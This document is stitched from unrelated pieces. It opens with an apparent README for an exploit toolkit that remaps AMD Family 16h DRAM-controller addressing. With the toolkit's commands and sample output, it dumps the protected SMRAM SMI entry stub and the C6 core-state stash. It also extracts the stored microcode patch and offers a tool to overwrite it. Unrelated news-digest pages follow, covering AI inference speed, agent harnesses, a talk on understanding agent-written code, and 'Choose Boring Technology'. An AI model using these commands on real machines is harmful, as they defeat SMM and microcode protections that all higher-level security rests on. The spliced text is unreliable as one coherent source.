./userspace/platform_check || exit 1

sudo modprobe msr

# SMBASE is per-core; core 0's lives in MSR 0xc0010111.
SMM_BASE=0x$(sudo rdmsr -p 0 0xc0010111)
SMI_ENTRY=$(( SMM_BASE + 0x8000 ))

# Dump the entry vector through the alias map and disassemble on the fly.
# SMM starts in real mode, so ndisasm gets -b 16. One --map per saved map;
# printf expands the glob into a --map for each (at_swizzle, at_bankswap) combo.
sudo ./userspace/dram_dump --protected-pa $SMI_ENTRY --length 0x40 \
    $(printf -- '--map %s ' data/maps/2x4gb_*.map) | ndisasm -b 16 -
; SMI entry stub — the first thing a core executes when entering the
; ultra-privileged System Management Mode.
mov si,0x8148           ; SI -> GDT pointer parked at SMBASE+0x8148, just past this stub
o32 lgdt [cs:si]        ; load it (o32 -> full 32-bit base, not real mode's 24-bit form)
mov eax,0x3             ; CR0.PE | CR0.MP
mov cr0,eax             ; flip the core into protected mode
jmp short 0x14          ; near jump to serialize and flush the prefetch queue post-switch
mov ax,0x18             ; GDT selector 0x18 -> flat data segment
mov ss,ax               ; reload SS for protected mode
mov eax,0x6efe2ff8      ; SMM stack top
mov esp,eax             ; install the SMM stack
o32 push byte +0x10     ; far-return frame: CS = code selector 0x10
mov ecx,0xc0010111      ; MSR SMM_BASE
rdmsr                   ; EAX = this core's SMBASE
mov ebx,eax             ; stash SMBASE
add eax,0x803a          ; EAX = SMBASE+0x803a, the 32-bit handler entry
push eax                ; far-return frame: EIP = SMBASE+0x803a
retfd                   ; far-return into 0x10:SMBASE+0x803a — the SMI handler proper

Those instructions run in ring -2, the most privileged context on the CPU, out of memory the chipset is supposed to make unreadable. SMRAM "locked" turns out to be a polite suggestion when we can talk to the DRAM controller directly.

Swap 2x4gb for whichever prefix in data/maps/ matches your installed DIMMs (sudo dmidecode -t memory). If your topology isn't there, run analysis/gather_aliases.py then analysis/unspaghettify.py to bake your own.


Quick start: unlock C6 DRAM

I have no idea what's in here and have never seen it discussed, likely internal CPU registers. Have fun.

When the cores power-gate into C6, each one's full x86 architectural context is stashed here for restore.

./userspace/platform_check || exit 1

# Resolve the C6 stash — sets CC6_BASE / CC6_SIZE (0x7f000000 / 0x800000 on the
# test box). Each idle core's state lives in a 16 KiB save area; four cores
# here, at CC6_BASE + {0, 0x4000, 0x8000, 0xc000}.
eval "$(sudo ./userspace/dram_carveouts --region cc6)"
sudo ./userspace/dram_dump --protected-pa $CC6_BASE --length 0x10000 \
    $(printf -- '--map %s ' data/maps/2x4gb_*.map) > cc6.bin

# For example, on this platform IA32_APIC_BASE sits at +0x9b8 in each area.
# Read it from all four cores straight out of the stash:
for c in 0 1 2 3; do
    printf 'core %d  ' $c
    hexdump -C -s $(( c*0x4000 + 0x9b8 )) -n 8 cc6.bin | head -1
done
core 0  000009b8  00 09 e0 fe 00 00 00 00  |........|   <- 0xfee00900  enabled, BSP bit set
core 1  000049b8  00 08 e0 fe 00 00 00 00  |........|   <- 0xfee00800  application processor
core 2  000089b8  00 08 e0 fe 00 00 00 00  |........|   <- 0xfee00800  application processor
core 3  0000c9b8  00 08 e0 fe 00 00 00 00  |........|   <- 0xfee00800  application processor

One core with the BSP bit set, three without — the boot processor and its three APs, caught mid-idle with their register state lying in the open.

The more you poke around, the more CPU registers you'll start to find:

offset x86 state core-0 value
+0x8b0 GS / per-cpu base 0xffff9be4e3600000
+0x9a0 CR3 (page-table root) 0x0fd46000
+0x9b8 IA32_APIC_BASE 0xfee00900
+0xa38 variable MTRR (base/mask) 0x6f000000 / …0800
+0xb10 saved RIP 0xffffffff8f3a0029

Of course, those registers are all accessible from ring-0 anyway. The fun part is in all the other CPU state sitting there — poking the internal CPU registers ring-0 can't reach.


Quick start: unlock your CPU microcode

What could go wrong?

When a core drops into C6 its microcode patch RAM — volatile SRAM — goes dark with the rest of the core. So the C6 stash keeps the loaded patch in DRAM and re-seeds it on wake. That copy sits at +0x1800 in each save area, and the alias reaches it like any other byte.

Grab the microcode copy the CPU stashed in fenced DRAM:

./userspace/platform_check || exit 1
eval "$(sudo ./userspace/dram_carveouts --region cc6)"

# page 1 of core 0's save area is the live microcode patch body
sudo ./userspace/dram_dump --protected-pa $((CC6_BASE + 0x1800)) --length 0x5f0 \
    $(printf -- '--map %s ' data/maps/2x4gb_*.map) > ucode_ram.bin

Match it against known patches:

# did we find it?
ram = open("ucode_ram.bin", "rb").read()
chunks = [ram[i:i+16] for i in range(0, len(ram)-16, 16) if ram[i:i+16].count(0) <= 12]
for fam in (15, 16, 17, 19):
    uc = open(f"/lib/firmware/amd-ucode/microcode_amd_fam{fam}h.bin", "rb").read()
    print(f"fam{fam}h: {sum(c in uc for c in chunks):2}/{len(chunks)} chunks match")

This is a good sign:

fam15h:  0/94 chunks match
fam16h: 68/94 chunks match     <- the microcode the core is running
fam17h:  0/94 chunks match
fam19h:  0/94 chunks match

Extract the ucode triads:

od -Ax -tx1 -w20 ucode_ram.bin
000000 c1 df db eb 28 ac 06 00 f5 ff ff 00 e1 1d 0a f9 ff ef ff 2a
000014 e0 8f 2a c7 ff bf 07 00 ff ff bf 2a e0 1f e0 e7 78 df 7d c0
000028 ff ff cf bf 4c 20 06 00 cf 53 39 00 c0 df db eb fe ff ff 27
   [...]
000370 e1 1f c0 bf ff bf 07 00 ff 81 7f 00 e1 1f c0 bf ff 81 7f 00
*
0005f0

And there it is, distinct uops up top, NOP padding repeating below.

From there, dram_dump has a sibling tool, dram_poke. The same alias that read the patch can write it — and this copy is the one the core reloads coming out of idle.

What you do next is up to your imagination.


Build

make        # builds kernel/spaghettify.ko and all userspace tools
make clean

Usage

Run as root. Full details in USAGE.md.

dram_read

Simple read from a protected memory address.

Push the --do-swizzle / --do-bankswap flips into the DRAM controller to enter the spaghettified memory view, read one dword from physical address <pa>, restore the DCT bits, and return the value.

dram_read
    --pa <pa>
    --do-swizzle <0|1>
    --do-bankswap <0|1>

dram_poke

Write into a protected memory range.

Each --map is a solved spaghettification from unspaghettify.py --save-map, itself fed by alias pairs collected by gather_aliases.py; the alias for every dword in the protected range is recovered from the map via a GF(2) pseudo-inverse computed once at startup. Pass multiple maps — one per (at_swizzle, at_bankswap) gathered on the same hardware — to widen coverage, since each spaghettification leaves a different set of rank-deficient holes and the first map that reaches a given dword wins.

dram_poke
    [--dangerously-skip-calibration]
    [--calibrate-pa <hex>]
    [--strict-holes]
    [--no-verify]
    [--ignore-fw-mismatch]
    [--fenced-range <lo>,<hi>]
    [--allow-fenced-alias]
    -s, --protected-pa <pa>
    -l, --length <n>
    --map <file> [--map <file>]...
    < in.bin

dram_dump

Read from a protected memory range.

Same --map machinery as dram_poke: each map is a solved spaghettification from unspaghettify.py --save-map, the alias for every dword is recovered via a one-shot GF(2) pseudo-inverse, and multiple maps gathered at different (at_swizzle, at_bankswap) widen coverage where one map's rank-deficient holes are filled by another's.

dram_dump
    [--dangerously-skip-calibration]
    [--calibrate-pa <hex>]
    [--dry-run]
    [--ignore-fw-mismatch]
    [--fenced-range <lo>,<hi>]
    [--allow-fenced-alias]
    -s, --protected-pa <pa>
    -l, --length <n>
    --map <file> [--map <file>]...

The full toolchain — dram_state, dram_carveouts, and dram_alias; the gather_aliases.py / unspaghettify.py analysis pipeline; worked end-to-end examples; and the internals — is documented in USAGE.md.


The shared pipeline

skitter-creek-bath-salts explores how the final stages of the MCT/DCT transforms can topple the security of everything built above it. The exploit demonstrated here is one configuration register on AMD Family 16h, picked because the datasheets gave enough to begin. The pipeline it broke is everywhere.

Channel interleave, rank interleave, bank interleave, swizzle, chip-select normalize — every modern memory controller does some version of all of it. AMD. Intel. ARM. RISC-V. Mobile. Server. Embedded. The same architectural shape sits underneath everything.

Above it all sits SEV, SGX, TDX, TrustZone, CCA realms, pKVM, CoVE, SEP, the PSP, ME, T-SEG, SMRAM, the C6 stash. Everything sitting in DRAM — even things walled off and invisible to ring-0 or the CPU itself — rests on the final layers of a *p pipeline we've just begun to explore.


References

  • Black Hat 2026 — Spaghettifying DRAM (Coming Soon)
The Daily Front Page 4 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Speed Desk
article

Accelerating GPT-5.6 Sol Ultrafast

by pr337h4m·▲ 521 points·218 comments·cerebras.ai ↗
delivering up to 750 output tokens per second and without any quality compromise

Today, Cerebras and OpenAI are sharing an early look at Ultrafast Mode, a new service tier launching first in the OpenAI API and powered by Cerebras. Ultrafast is available initially to a select group of customers, with access expanding over time. Cerebras powers GPT-5.6 Sol on Ultrafast mode, delivering up to 750 output tokens per second and without any quality compromise, allowing Sol Ultrafast to accelerate your most time-sensitive, mission-critical work.

Frontier Intelligence at Unprecedented Speed

AI builders have always needed to choose between speed and intelligence. As models scale up in size and intelligence, they incur higher computational and data movement costs, slowing down response times. Users often need to wait for high-quality results or accept inferior results within a shorter timeframe.

GPT-5.6 Sol Ultrafast resolves this tradeoff, bringing frontier intelligence to products and workflows where every second matters. Compared with output speeds reported by Artificial Analysis GPT-5.6 Sol on Ultrafast mode runs 11x faster than Fable 5, and 5x faster than Opus 4.8 on Fast mode.

At Cerebras, we put Ultrafast to the test by running it head-to-head with popular models on Humanity's Last Exam. HLE is a challenging model benchmark that consists of 2,500 questions typically answerable only by those holding PhDs in fields such as chemistry, economics, and literature.

In our evaluations, GPT-5.6 Sol on Ultrafast mode answered all 2,500 HLE questions in 11 hours and 11 minutes. Claude Fable 5 needed 78 hours and 27 minutes, more than three days of continuous compute, to arrive at the same conclusions. In other words, Ultrafast worked through the frontier of human knowledge in a single working day, achieving comparable accuracy nearly 7× faster.

Humanity's Last Exam Benchmark

Benchmarking was performed by Cerebras using GPT 5.6 Sol Ultrafast with Codex on xhigh reasoning on July 10 and Claude Fable 5 with Claude Code on xhigh reasoning on July 13-15.

As model capabilities continue to advance, the range of applications for fast inference expands. GPT-5.6 Sol is OpenAI’s best model yet for legal briefs, financial models, and engineering reports. On GDP-Val, a benchmark for economically valuable knowledge work tasks, Ultrafast delivered a 5.6x end-to-end speedup with no quality degradation, showing how faster inference can accelerate economically valuable work.

Benchmarking was performed by Cerebras on July 31 2026 using GPT 5.6 Sol and GPT 5.6 Sol Ultrafast on medium reasoning within Codex.

High-Speed Intelligence Powers High-Stakes Work

Faster intelligence changes what’s possible for individuals and organizations. With Ultrafast, you can now put agents on the critical path of problems where every second counts.

"With GPT-5.6 Sol Ultrafast, Cerebras enables AI that keeps up with how you think, code, and collaborate. We’re excited to see how workflows and applications are transformed by Ultrafast inference."

Rohan Varma

Product at OpenAI

Ultrafast is a persistent edge for organizations using frontier AI to quickly respond to incoming information. Companies operating web services can leverage Ultrafast to root-cause and address production outages, preserving customer trust, preventing lost revenue, and saving downtime minutes against their SLAs. And in adversarial, high stakes cyberattacks, Ultrafast is an invaluable tool for security teams who must quickly detect and respond to bad actors to contain catastrophic losses.

More broadly, Ultrafast enables entirely new modes of working with agents, it delivers real-time insights and updates, so you don’t have to context-switch across multiple parallel sessions to get the most out of your agents.

"Whereas formerly I might have to wait a couple minutes for a task to finish, it now finishes for me before I even have the opportunity to context-switch. It makes me way more productive."

Jeffrey Wang

OpenAI Researcher

With Ultrafast, researchers and engineers can reserve their attention for going deep on select problems that matter most, while continuing to use Standard processing for parallelizing commodity tasks. Cerebras is excited to power the next wave of AI innovation, raising the ceiling for what individuals and organizations can accomplish with responsive AI.

Breakneck Speed is Enabled by Breakthrough Innovation

GPT-5.6 Sol on Ultrafast mode is powered by Cerebras’ revolutionary Wafer-Scale Engine architecture, purpose-built for frontier AI workloads. Fast frontier inference is a data movement problem: on GPUs, inference on large models is bottlenecked by memory bandwidth, as model weights must be repeatedly transferred between on-chip memory and off-chip storage to generate successive tokens within a model response.

Cerebras takes a contrarian approach to eliminating this inefficient data movement: we pack 44 GB of SRAM on each wafer-sized chip. Weights stay on-chip, and tokens flow uninterrupted through model layers pipelined across wafers. This technical approach scales smoothly with model size, paving the way for a continued speed advantage on future frontier models.

Ultrafast: Now in Limited Preview

GPT-5.6 Sol on Ultrafast mode is available in a limited preview today to a select group of customers. Access will expand as capacity grows. Sign up for updates.

The Daily Front Page 5 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Agent Works
article

DeepSeek Harness developer preview

by bjin·▲ 608 points·261 comments·deepseek.com ↗
Every capability is a plugin that can be swapped or recomposed.

DeepSeek Harness is now in developer preview for agent harness developers worldwide — source code included.

Every capability is a plugin that can be swapped or recomposed: models, tools, skills, sessions, sandboxes, storage, loops, scheduling, and the UI.

Quick start

$ npx @deepseek-ai/dsh web

Install from source

$ git clone https://github.com/deepseek-ai/deepseek-harness

Agent = Model + Harness

Harness keeps agents working in real-world environments

The model is the soul of an agent.

A harness lets an agent understand its environment, use tools, and keep working in real-world settings.

Cordis kernel

The Cordis kernel manages plugin mounting, unmounting, and dependencies. Agent capabilities live in the plugins.

Capabilities as plugins

Plugins provide every agent capability, including models, tools, skills, sessions, sandboxes, storage, loops, scheduling, and the UI. Cordis services and events let the plugins work together.

Compose with configuration

Developers can select, swap, or extend any capability in configuration without changing the DeepSeek Harness source code.

Everything is a plugin. Every run is traceable.

Everything is a plugin

DeepSeek Harness is built on Cordis's plugin system. Plugins provide every agent capability, including models, tools, skills, sessions, sandboxes, storage, loops, scheduling, and the UI. Cordis services and events let the plugins work together. Developers can select, swap, or extend any capability in configuration without changing the DeepSeek Harness source code.

Every run is traceable

Everything the model sees is recorded in an append-only session log: system prompts, reasoning, tool calls and results, subagent scheduling, and every context injection. In the Trajectory view, you can inspect these records by source. Resume, fork, search, and replay all operate on the same event stream.

Multiple runtime modes

Standard mode includes the full toolset. Code mode uses model-generated code to orchestrate multiple rounds of tool calls. Minimal mode keeps only a shell tool and a file editor for benchmarking models in a minimal environment. Creator mode lets you inspect the current runtime, test Cordis plugins in memory, and combine them into new modes.

DeepSeek Harness settings showing installed plugins and their status

Reconstruct a complete run from a single session log

Standard mode

Full coding agent with file editing, shell, file and web search, skills, planning, goals, subagents, and workflows.

Code mode

All Standard mode capabilities, with tools exposed through the Code Mode SDK so the model can combine multi-step operations in one TypeScript program.

Minimal mode

Two-tool coding agent with persistent bash and str_replace_editor.

Creator mode

Built for creating custom agent presets, with all Standard mode capabilities plus runtime inspection, plugin experiments, and preset-authoring guidance.

Customize your DeepSeek Harness

Try it now or install from source

Quick start

Install Node.js, then launch the Web UI with npx.

$ npx @deepseek-ai/dsh web

Install from source

Clone the full source and follow the setup instructions in the repository.

$ git clone https://github.com/deepseek-ai/deepseek-harness

Join the DSH plugin ecosystem

DeepSeek Harness remains in developer preview and is still being tested by developers building agent harnesses. Its core plugins and APIs will continue to evolve. We look forward to exploring the limits of intelligence with developers worldwide using open-source infrastructure that is reusable and composable.

The Daily Front Page 6 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Agent Works
article

Launch HN: Bullet (YC S26) – A Faster Coding Agent

by adi1·▲ 93 points·67 comments·codewithbullet.com ↗

Bullet routes, searches, and executes with one purpose: keeping up with you.

YOUR IDEAS MOVE FAST. YOUR AGENT SHOULD TOO.

We were burning hours waiting on agent runs. Not because the models were incapable. The machinery around them was simply heavier than it needed to be.

LEANER BY DEFAULT.

Same model → tools → results pattern.
A tighter loop around it.

Right model. Right moment.

Route straightforward work to fast models. Escalate only when the mission demands it.

Acquire the target. Ignore the noise.

Targeted search and file reads find relevant code without embedding the whole repo.

Never queue what can run together.

Independent tool calls execute in parallel. Duplicate calls and stuck loops are intercepted before they waste another second.

SEE BULLET IN ACTION.

Real prompt. Real repository.
No cinematic shortcuts.

Bullet product demo interface

NO GUI. SAME AGENT.

Same router, tools, and agent loop.
Now it lives in your shell.

$ npm install -g @trybullet/cli

$ bullet

macOS & Linux · Node 18+ · free, no key required to start

BUILT OUT OF FRUSTRATION.

At our company, we were burning hours waiting on agent runs. We were building with Claude Code every day, watching capable models move through needlessly slow machinery.

So Bullet began as a passion project: route simple work faster, read only what matters, run independent tools together, and stop loops before they spiral.

We use it internally now. It saved us a headache. We thought it might save you one too.

DON'T LET YOUR CODE
HOLD YOU HOSTAGE.

STOP WAITING.

Free to use. No subscriptions.
Just a faster way to ship.

The Daily Front Page 7 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Human in the Loop
article

Understanding is the new bottleneck

by sebg·▲ 270 points·147 comments·geoffreylitt.com ↗
I think it's still important to understand the code that our agents write!

This is a written version of a talk I gave at the AI Engineer conference in July 2026, also shared as a tweet thread.

Title slide: Understanding is the new bottleneck. Geoffrey Litt, Design Engineer at Notion.

Hot take: I think it's still important to understand the code that our agents write!

In this talk I'll explain why that's the case, and show some ideas for how to efficiently understand code. Alright, let's dive in.

Cartoon of a person surrounded by a growing pile of agent-written code.

Agents are writing more and more code for us, and we all know it's getting harder to keep up.

But the good news is: there are many ways to understand code! Reading diffs line by line is not the only way.

Slide listing techniques: code explainer docs, quizzes, micro-worlds.

Most of this talk will be about techniques I have found helpful to understand systems my agents are building:

  • Code explainer docs
  • Quizzes to check my understanding
  • Micro-worlds that I can play with to understand the system

But first we have to ask a more basic question…

Why understand?

Slide reading: Why understand?

Why? Why understand?

Aren't we supposed to be taking ourselves out of the loop now, and letting the agents loop themselves? As the agents get smarter, doesn't it become less important for us to be in the details?

I think many people — even those who are pro-understanding — have a slightly incorrect answer to this question!

Slide: understand to verify.

One possible answer: we understand to verify. We check the agent's work, we see if it's correct.

Correct can mean many things: does it match the spec, is it well architected… but it's fundamentally a thumbs-up / thumbs-down question.

Slide about agents getting better at verifying their own work.

Here's the thing: the agents are getting better and better at verifying their own work. And this is good! I like it when my agent doesn't make mistakes.

But hmm. Where does that leave us humans?

Slide: understand to participate.

That's where another answer comes in: we can understand to participate.

You can learn what the agent is doing to make sure you can be an active participant in the creative process. Here's why this matters…

Diagram of a project as many iterative loops with an agent.

It's never just one loop! A project is many, many loops with the agent.

And the understanding you have of the system is part of your ability to come up with the next idea to evolve it.

You need a rich set of concepts in your mind to think creatively and fluently about how to move something forward. If you're lacking that fluency, your ability to participate in the project is meaningfully limited.

Quote from Margaret Storey on cognitive debt: the humans involved may have simply lost the plot.

By the way, this relates closely to the idea of cognitive debt, popularized by Margaret Storey and Simon Willison.

It's like tech debt: you can get away with not understanding what's going on in the short term, but it'll bite you eventually.

Slide asking: how do we build understanding? Pointing to education for inspiration.

OK, so fine, understanding matters.

But this raises the next question: how? How do we build this human understanding when we're working with AI and moving fast?

Well, turns out this is not the first time anyone has ever thought about how to communicate understanding. I think we can look to education as an inspiration. Can we steal the best ideas ever invented for education and apply them to this problem?

Technique 1: Explanations

Slide listing three techniques, with 'explanations' highlighted.

Today I want to share three techniques that show how we can attempt this.

First: explanations. What makes a good explanation?

Slide showing a raw code diff.

Whenever an agent finishes some work, it's an opportunity for an explanation — an artifact.

Most naively, we can read a code diff: the raw material that changed.

Slide asking: what would the best explanation be?

But what if we ask:

What would the best explanation be? If you had a team — human or AI — that really sweat the details of explaining something well to you, how would that feel?

Screenshot of a code explainer doc produced by the /explain-diff skill.

Here's one answer. I made a skill called /explain-diff, which I use every day and many coworkers have found valuable.

It outputs thoughtfully structured code explainers as HTML, markdown, or Notion docs. Notion is a good place for collaborating on and discussing these explainers as a team. (Disclaimer: I work at Notion so I'm biased.)

Let's see what's in one of these explainers, using an example of editing the perspective of a video game.

Explainer section teaching background info about the game engine.

First principle: teach me background info!

Before we even get to what changed, help me understand what was already there. In this case, teach me about the game engine.

Explainer section stating the goal of the change and explaining isometric projection.

Second principle: intuition before details.

Before any code, it states the goal — “make the garden feel three-dimensional with 2D drawing tricks” — and explains related concepts, like what isometric projection is.

All of this builds my intuition for the essence of the change. It's catching me up as the human so I can be an equal participant in understanding.

You can also build intuition with interactive figures.

Here I'm understanding the isometric perspective by dragging rocks around the garden and watching their coordinates move.

(This is using a new feature Notion just shipped: you can now embed interactive HTML inside pages.)

Slide contrasting a raw diff with a literate diff structured as prose.

We finally get to the code. But a typical diff is a pile of files edited in alphabetical order with no explanation.

A “literate diff” as I call it is structured as prose — walking through the changes in a sensible order, with surrounding explanation and embedded code snippets. Faster to review than a raw diff.

Photo of a printed code explainer packet at a café.

The end result of all of this is a nice explainer packet. I still read the code diff but I always read this first.

Sometimes I'll print these out and take them to the café — less distracting.

It's beautifully ironic: AI turns an interactive activity into a static paper report I can focus on deeply :)

Slide quoting Andy Matuschak: books don't work. Screenshot of Quantum Country.

There's only one problem: reading is hard work 😅

As Andy Matuschak says: “books don't work”! It's too easy to fool yourself into thinking you did the reading when you really didn't retain or understand.

How do we fix this? I took inspiration from Andy and Michael Nielsen's work on embedding spaced repetition quizzes in essays.

I do something similar with my code explainers now. At the bottom of an explainer there's an interactive quiz — five questions about the change — and I try to answer them.

My rule: I won't send code to others until I can pass the quiz, and I do the same when reviewing others' code.

Slide describing the quiz as a speed regulator on the AI loop.

A quiz is a speed regulator. Working with AI, it's easy for the loop to run faster than the speed of human understanding.

The quiz is a counterbalancing force: I mechanically ask “do I actually understand?” so that I can remain a full creative participant.

QR code linking to the /explain-diff skill.

OK, so that's explain-diff. Here's the skill if you want it: two variants that output either HTML or a Notion page.

Technique 2: Micro-worlds

Slide introducing micro-worlds, with a photo of Seymour Papert.

Next idea: micro-worlds. This one's inspired by the visionary educator Seymour Papert.

Slide about Papert's idea of living in Mathland.

Papert had this beautiful idea he called living in Mathland: if you want to learn math, live in Mathland — just like if you want to learn French, you go live in France. Could we build an environment where children learn math naturally, as a consequence of their curiosity?

So how do we apply that to code? Can we make worlds you inhabit and naturally intuit how the system works and how it's changing?

Last year I was coding a Prolog interpreter and struggling to intuit what was happening inside.

I worked with an agent to build this debugger, which let me step through the execution of my logic language — scrub through time, see what's on the stack and which rules are evaluated at each step. I could even leave comments for myself (“nice, we correctly applied that rule”).

There's a big difference between making a tool for me to debug and letting the agent debug — doing it myself is how I develop understanding along the way.

Another example. I was migrating my personal website from one framework to another, and Claude wrote a script that did it. But it was very hard to review: I wasn't familiar with the new framework, and all I could say was “I guess that looks about right.”

So I asked Claude to make me a video game — a command center where I do the port myself, step by step, watching the visible effects and the file tree evolve. It produced a UI where I click buttons to run the port step by step, with my old site and new site running side by side.

In this command center I watched the new site come to life incrementally. That left me with a similar understanding to doing it by hand — but much faster, because the whole experience was laid out for me.

Slide reading: agents can write code to help us understand code!

The point here is that agents can write bits of code that help us humans understand other code.

This is a big deal!

Technique 3: Shared spaces

Slide introducing shared spaces: understanding together as a team.

Alright, last technique: shared spaces. So far this has all been about understanding solo… but when you're working on a team, you need to understand together.

Slide about shared mental models enabling efficient communication.

When you and someone else hold the same mental model, you can communicate efficiently. You have a shared vocabulary that evokes the same images, so you can jam and riff and have creative conversations. Without those shared structures, those conversations are much harder.

I'm really excited about creating shared environments where teams build that understanding together. It's kinda what Notion is all about too.

Screenshot of Claude and Cursor agents running inside Notion.

Recently in Notion we've been shipping tons of new features for humans and agents to work together, so your whole team develops a shared understanding instead of each working in a silo.

One tiny example: you can now run Claude and Cursor agents in Notion. I do a lot of my coding that way now.

And when those agents make a technical plan in Notion, it's in a collaborative page by default, so I can comment on it with my team and discuss immediately. Thinking together, not alone!

The point was always to augment

Slide: it's still important for humans to understand how things work.

Alright, let's wrap up. Today we've covered some techniques that were about understanding code… but actually I think this is a much bigger issue.

It's still important for humans to understand how things work in general! Not just to verify, but to participate.

And surprise surprise, this is not a new idea. It harkens back to the very origins of our field of computing…

Alan Kay's vision: kids learning physics by playing and editing an interactive simulation.

50 years ago Alan Kay envisioned that computers could be a new medium, better than the book, for teaching people — especially kids — how to think about the world.

In this picture, it might look like these kids are watching YouTube on an iPad, but they're not. They're playing an interactive game and editing the code as they play it to get a better understanding of physics. This was 50 years ago!!

Astronaut meme: wait, the point of computers is to create new dynamic simulations to help people understand complex concepts? Always has been.

And now hopefully you understand this meme.

The point was always to augment, not just automate.

It's beautiful that AI now makes creating simulations so accessible… Having AI teach us is one of the greatest possibilities computing has ever opened up.

Closing slide: we can get deeper in the loop. It's up to us.

This makes me very optimistic about the future!

If we build the right tools, we can now understand the world better than we ever could before. We don't have to merely take ourselves out of the loop, we can get deeper in the loop too. It's up to us.

FIN

The Daily Front Page 8 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Case for the Reliable
article

Choose Boring Technology (2015)

by tosh·▲ 302 points·149 comments·mcfunley.com ↗
Let’s say every company gets about three innovation tokens.

Choose Boring Technology

Probably the single best thing to happen to me in my career was having had Kellan placed in charge of me. I stuck around long enough to see Kellan’s technical decisionmaking start to bear fruit. I learned a great deal from this, but I also learned a great deal as a result of this. I would not have been free to become the engineer that wrote Data Driven Products Now! if Kellan had not been there to so thoroughly stick the landing on technology choices.

Being inspirational as always.

In the year since leaving Etsy, I’ve resurrected my ability to care about technology. And my thoughts have crystallized to the point where I can write them down coherently. What follows is a distillation of the Kellan gestalt, which will hopefully serve to horrify him only slightly.

Embrace Boredom.

Let’s say every company gets about three innovation tokens. You can spend these however you want, but the supply is fixed for a long while. You might get a few more after you achieve a certain level of stability and maturity, but the general tendency is to overestimate the contents of your wallet. Clearly this model is approximate, but I think it helps.

If you choose to write your website in NodeJS, you just spent one of your innovation tokens. If you choose to use MongoDB, you just spent one of your innovation tokens. If you choose to use service discovery tech that’s existed for a year or less, you just spent one of your innovation tokens. If you choose to write your own database, oh god, you’re in trouble.

Any of those choices might be sensible if you’re a javascript consultancy, or a database company. But you’re probably not. You’re probably working for a company that is at least ostensibly rethinking global commerce or reinventing payments on the web or pursuing some other suitably epic mission. In that context, devoting any of your limited attention to innovating ssh is an excellent way to fail. Or at best, delay success [1].

What counts as boring? That’s a little tricky. “Boring” should not be conflated with “bad.” There is technology out there that is both boring and bad [2]. You should not use any of that. But there are many choices of technology that are boring and good, or at least good enough. MySQL is boring. Postgres is boring. PHP is boring. Python is boring. Memcached is boring. Squid is boring. Cron is boring.

The nice thing about boringness (so constrained) is that the capabilities of these things are well understood. But more importantly, their failure modes are well understood. Anyone who knows me well will understand that it’s only with a overwhelming sense of malaise that I now invoke the spectre of Don Rumsfeld, but I must.

To be clear, fuck this guy.

When choosing technology, you have both known unknowns and unknown unknowns [3].

  • A known unknown is something like: we don’t know what happens when this database hits 100% CPU.
  • An unknown unknown is something like: geez it didn’t even occur to us that writing stats would cause GC pauses.

Both sets are typically non-empty, even for tech that’s existed for decades. But for shiny new technology the magnitude of unknown unknowns is significantly larger, and this is important.

Optimize Globally.

I unapologetically think a bias in favor of boring technology is a good thing, but it’s not the only factor that needs to be considered. Technology choices don’t happen in isolation. They have a scope that touches your entire team, organization, and the system that emerges from the sum total of your choices.

Adding technology to your company comes with a cost. As an abstract statement this is obvious: if we’re already using Ruby, adding Python to the mix doesn’t feel sensible because the resulting complexity would outweigh Python’s marginal utility. But somehow when we’re talking about Python and Scala or MySQL and Redis people lose their minds, discard all constraints, and start raving about using the best tool for the job.

Your function in a nutshell is to map business problems onto a solution space that involves choices of software. If the choices of software were truly without baggage, you could indeed pick a whole mess of locally-the-best tools for your assortment of problems.

The way you might choose technology in a world where choices are cheap: "pick the right tool for the job."

But of course, the baggage exists. We call the baggage “operations” and to a lesser extent “cognitive overhead.” You have to monitor the thing. You have to figure out unit tests. You need to know the first thing about it to hack on it. You need an init script. I could go on for days here, and all of this adds up fast.

The way you choose technology in the world where operations are a serious concern (i.e., "reality").

The problem with “best tool for the job” thinking is that it takes a myopic view of the words “best” and “job.” Your job is keeping the company in business, god damn it. And the “best” tool is the one that occupies the “least worst” position for as many of your problems as possible.

It is basically always the case that the long-term costs of keeping a system working reliably vastly exceed any inconveniences you encounter while building it. Mature and productive developers understand this.

Choose New Technology, Sometimes.

Taking this reasoning to its reductio ad absurdum would mean picking Java, and then trying to implement a website without using anything else at all. And that would be crazy. You need some means to add things to your toolbox.

An important first step is to acknowledge that this is a process, and a conversation. New tech eventually has company-wide effects, so adding tech is a decision that requires company-wide visibility. Your organizational specifics may force the conversation, or they may facilitate developers adding new databases and queues without talking to anyone. One way or another you have to set cultural expectations that this is something we all talk about.

One of the most worthwhile exercises I recommend here is to consider how you would solve your immediate problem without adding anything new. First, posing this question should detect the situation where the “problem” is that someone really wants to use the technology. If that is the case, you should immediately abort.

I just watched a webinar about this graph database, we should try it out.

It can be amazing how far a small set of technology choices can go. The answer to this question in practice is almost never “we can’t do it,” it’s usually just somewhere on the spectrum of “well, we could do it, but it would be too hard” [4]. If you think you can’t accomplish your goals with what you’ve got now, you are probably just not thinking creatively enough.

It’s helpful to write down exactly what it is about the current stack that makes solving the problem prohibitively expensive and difficult. This is related to the previous exercise, but it’s subtly different.

New technology choices might be purely additive (for example: “we don’t have caching yet, so let’s add memcached”). But they might also overlap or replace things you are already using. If that’s the case, you should set clear expectations about migrating old functionality to the new system. The policy should typically be “we’re committed to migrating,” with a proposed timeline. The intention of this step is to keep wreckage at manageable levels, and to avoid proliferating locally-optimal solutions.

This process is not daunting, and it’s not much of a hassle. It’s a handful of questions to fill out as homework, followed by a meeting to talk about it. I think that if a new technology (or a new service to be created on your infrastructure) can pass through this gauntlet unscathed, adding it is fine.

Just Ship.

Polyglot programming is sold with the promise that letting developers choose their own tools with complete freedom will make them more effective at solving problems. This is a naive definition of the problems at best, and motivated reasoning at worst. The weight of day-to-day operational toil this creates crushes you to death.

Mindful choice of technology gives engineering minds real freedom: the freedom to contemplate bigger questions. Technology for its own sake is snake oil.

Update, July 27th 2015: I wrote a talk based on this article. You can see it here.


  1. Etsy in its early years suffered from this pretty badly. We hired a bunch of Python programmers and decided that we needed to find something for them to do in Python, and the only thing that came to mind was creating a pointless middle layer that required years of effort to amputate. Meanwhile, the 90th percentile search latency was about two minutes. Etsy didn't fail, but it went several years without shipping anything at all. So it took longer to succeed than it needed to.

  2. We often casually refer to the boring/bad intersection of doom as “enterprise software,” but that terminology may be imprecise.

